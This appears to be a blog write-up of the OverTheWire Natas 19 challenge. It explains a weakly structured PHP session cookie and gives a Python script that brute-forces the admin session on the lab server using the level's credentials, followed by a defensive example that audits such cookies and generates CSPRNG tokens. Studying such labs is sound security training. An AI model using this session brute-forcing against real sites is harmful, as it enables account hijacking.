DISCLAIMER: The information in this site is for educational purpose only. The authors of this blog are not responsible for any kind of misuse of this information.

Friday, December 13, 2013

OverTheWire Natas 19

When inspecting our PHPSESSID cookie, we can see that it seems to be hex-encoded. Decoding it confirms this, and the structure is:
PHPSESSID = hex((sessid)+'-'+(username))

where (sessid) is a random number, probably in {1,2,...,641} (observed by deleting the PHPSESSID cookie several times).

We are interested, again, in the admin user's session. So (username) will be replaced with 'admin', and we will brute-force the (sessid) parameter as we did in the previous level.

import requests

# Try every candidate (sessid), highest first, with the username fixed to 'admin'
for sessid in range(641, 0, -1):
    # Cookie format: hex((sessid) + '-' + 'admin')
    cookie = (str(sessid) + '-admin').encode().hex()
    r = requests.get('http://natas19.natas.labs.overthewire.org',
                     auth=('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'),
                     cookies={'PHPSESSID': cookie})

    if 'You are an admin' in r.text:
        print(r.text)  # print next level credentials
        break
Solved :)
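
Seen from the defender's side, the level works because the cookie embeds the username and only about 641 values of (sessid) exist. The following is an added example, not code from the original post or from OverTheWire; the function names and sample values are assumptions made for illustration. It rebuilds the format, audits a cookie for it, and contrasts it with an opaque CSPRNG token:

```python
import binascii
import math
import re
import secrets

# Format described in the post: hex((sessid) + '-' + (username))
WEAK_FORMAT = re.compile(r"^(\d+)-(.*)$")
MAX_SESSID = 641  # upper bound the post observed for (sessid)


def weak_session_id(username, sessid):
    """Rebuild the level's cookie format (the weak 'before' case)."""
    return f"{sessid}-{username}".encode().hex()


def strong_session_id(nbytes=16):
    """Hardened form: opaque token from the OS CSPRNG, no user data inside."""
    return secrets.token_hex(nbytes)


def keyspace_bits(candidates):
    """Bits of guessing work for a uniformly chosen value among `candidates`."""
    return math.log2(candidates)


def audit_session_id(cookie):
    """Classify one cookie value as 'structured' (matches the weak format) or 'opaque'."""
    try:
        text = binascii.unhexlify(cookie).decode("ascii")
    except ValueError:  # not hex, odd length, or not ASCII after decoding
        return ("opaque", None)
    m = WEAK_FORMAT.match(text)
    if m and text.isprintable():
        return ("structured", {"sessid": int(m.group(1)), "username": m.group(2)})
    return ("opaque", None)


if __name__ == "__main__":
    # Constructed sample values, not captured from the real service
    weak = weak_session_id("alice", 123)
    strong = strong_session_id()
    print(weak, audit_session_id(weak))
    print(strong, audit_session_id(strong))
    print(f"weak id: ~{keyspace_bits(MAX_SESSID):.1f} bits, strong id: {16 * 8} bits")
```
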
